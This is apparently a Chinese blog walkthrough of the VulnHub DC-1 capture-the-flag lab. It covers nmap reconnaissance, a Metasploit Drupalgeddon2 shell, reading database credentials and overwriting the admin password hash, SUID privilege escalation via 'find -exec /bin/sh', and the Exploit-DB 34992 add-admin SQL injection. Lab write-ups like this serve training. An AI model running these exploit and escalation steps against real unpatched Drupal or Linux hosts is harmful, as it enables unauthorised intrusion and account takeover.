DC1靶場練習

Minarui發表於2024-05-07

DC1

下載地址:

https://download.vulnhub.com/dc/DC-1.zip

題目要求:

DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

It was designed to be a challenge for beginners, but just how easy it is will depend on your skills and knowledge, and your ability to learn.

To successfully complete this challenge, you will require Linux skills, familiarity with the Linux command line and experience with basic penetration testing tools, such as the tools that can be found on Kali Linux, or Parrot Security OS.

There are multiple ways of gaining root, however, I have included some flags which contain clues for beginners.

There are five flags in total, but the ultimate goal is to find and read the flag in root's home directory. You don't even need to be root to do this, however, you will require root privileges.

Depending on your skill level, you may be able to skip finding most of these flags and go straight for root.

Beginners may encounter challenges that they have never come across previously, but a Google search should be all that is required to obtain the information required to complete this challenge.

資訊收集

1.1 arp-scan -l

image

1.2 ifconfig

image

1.3 nmap -p- -sV 192.168.126.130

發現rpcbind

111埠rpcbind服務 可以利用udp反射進行ddos攻擊

image

1.4 whatweb

滲透

2.1 發現drupal 7

2.2 進入msf

2.3 search drupal

2.3 嘗試到unix/webapp/drupal_drupalgeddon2遠端命令執行漏洞

use 1

show options

set rhost 192.168.126.130

run

getshell成功

sysinfo(help檢視可用命令)

ls

2.4 發現flag1.txt

cat flag1.txt

資料庫

3.1 提示drupal網站配置檔案有東西

3.2 發現資料庫

3.3 切換到主機的cmd中

shell

或者

shell

獲取完全互動式終端

python -c 'import pty;pty.spawn("/bin/bash")'

script /dev/null

3.4 mysql -udbuser -p

R0ck3t

show databases;

use drupaldb;

show tables;

select * from users;

(退出exit

3.5 由前面檢視網站配置檔案時發現加鹽MD5

所以該hash無法爆破

另闢蹊徑

3.6 密碼重置

find / -name "password-hash.sh"

php /var/www/scripts/password-hash.sh 123

複製加salt之後的md5

$S$DRg21kugCL0AGQqr1G90hPfO.XkoCuhFqYU.HZfT8me7BiSMlYPT

image

再次進入mysql中

update users set pass="$S$DMHrgiAJFOw9uyksr.7CaAWWS1eMIGnGmCCjFFZrNdaDIg4dcw8B" where uid=1;

image

4.1 登入後臺

http://192.168.126.130

左上角的context

4.2 找到flag3

image

image

根據提示

cat /etc/passwd

cat /home/flag4.txt

4.3找到flag4

image

提權

5.1 根據flag4提示提權

linux提權之suid提權

5.2 查詢具有suid的命令

find / -perm -u=s -type f 2>/dev/null

find本身就有suid

image

5.3 find提權

find /usr/bin/find -exec "/bin/sh" \;

image

cd /root

cat thefinalflag.txt

5.4 找到最後一個flag

image

排漏

3.7 CVE-2014-3704-Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)

3.8 searchsploit Drupal

發現Drupal 7 有一個admin使用者新增漏洞

image

3.9 定位

locate php/webapps/34992.py

3.10 複製到桌面

cp /usr/share/exploitdb/exploits/php/webapps/34992.py ./

3.11 檢視用法

cat 34992.py

image

3.12 新增test/test成功

image

3.13 登入後臺

image

3.14 也是可以看到flag3

image